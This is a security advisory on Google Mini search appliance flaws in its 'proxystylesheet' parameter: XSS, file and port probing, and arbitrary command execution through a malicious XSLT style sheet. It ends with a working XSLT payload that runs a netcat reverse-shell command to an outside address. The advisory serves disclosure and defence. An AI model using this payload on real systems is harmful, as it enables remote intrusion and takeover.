|
|
|
|
| |
"The Google Mini offers cost-effective, high-quality search for your public website or intranet "
By supplying a malicious XSLT, attackers may execute arbitrary programs, retrieve system information or cause XSS vulnerability with Google mini appliance. |
| |
Credit:
The information has been provided by H D Moore.
The original article can be found at: http://metasploit.com/research/vulns/google_proxystylesheet/
OSVDB advisories can be found at: http://osvdb.org/20977, http://osvdb.org/20978, http://osvdb.org/20979,
http://osvdb.org/20980, http://osvdb.org/20981
Google's Mini appliance security issues can be found at: http://www.google.com/support/gsa/bin/answer.py?answer=15857
|
| |
Vulnerable Systems:
* Google Mini Search Appliance
The Google Search Appliance allows customization of the search interface through XSLT style sheets. Certain versions of the appliance allow a remote URL to be supplied as the path to the XSLT style sheet. This feature can be abused to perform cross-site scripting (XSS), file discovery, service enumeration, and arbitrary command execution.
The Google Search Appliance search interface uses the 'proxystylesheet' form variable to determine what style sheet to apply to the search results. This variable can be a local file name or a HTTP URL.
Error Message XSS:
A cross-site scripting flaw can be exploited by providing a snippet of malicious Javascript code for the proxystylesheet variable. The appliance will look for a local file by that name and then display an error message containing the Javascript code.
XSLT Style Sheet XSS:
A cross-site scripting flaw can be exploited by creating a malicious XSLT style sheet and specifying the URL to this style sheet in the proxystylesheet parameter. The appliance will download the style sheet and present the malicious Javascript to the user who executed the search.
Information disclosure 1:
It is possible to determine the existence of any file on the system by using a relative path from the style sheet directory. The error message returned from the server will disclose whether or not a valid path was provided. This can be used to fingerprint the base operating system and kernel version.
Information disclosure 2:
A rudimentary port scan can be performed by requesting HTTP URLs that point to a target system and individual ports on that system. The error message returned from the server will differ between open and closed ports. The appliance will ignore requests to connect back to itself, but no other restrictions apply.
XSLT Java Code Execution:
It is possible to execute arbitrary Java class methods on the appliance by creating a malicious XSLT style sheet. System commands can be executed as an unprivileged user, which combined with the vulnerable kernel version, can lead to a remote root shell. The appliance uses the Saxon XSLT parser, which allows the following snippet to work:
< !-- Google Mini XSLT Code Execution [metasploit] -->
XSLT Version: < xsl:value-of select="system-property('xsl:version')"/ >
< br / >
XSLT Vendor: < xsl:value-of select="system-property('xsl:vendor')" / >
< br / >
XSLT URL: < xsl:value-of select="system-property('xsl:vendor-url')" / >
< br / >
OS: < xsl:value-of select="sys:getProperty('os.name')" / >
< br / >
Version: < xsl:value-of select="sys:getProperty('os.version')" />
< br / >
Arch: < xsl:value-of select="sys:getProperty('os.arch')" / >
< br / >
UserName: < xsl:value-of select="sys:getProperty('user.name')" / >
< br / >
UserHome: < xsl:value-of select="sys:getProperty('user.home')" / >
< br / >
UserDir: < xsl:value-of select="sys:getProperty('user.dir')" / >
< br />
Executing command...< br / >
< xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS} 255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" / >
< /span >
< /xsl:template >
Vendor Status:
The vendor has issued a fix for customers.
|
|
|
|
|
|
|
|
|
|
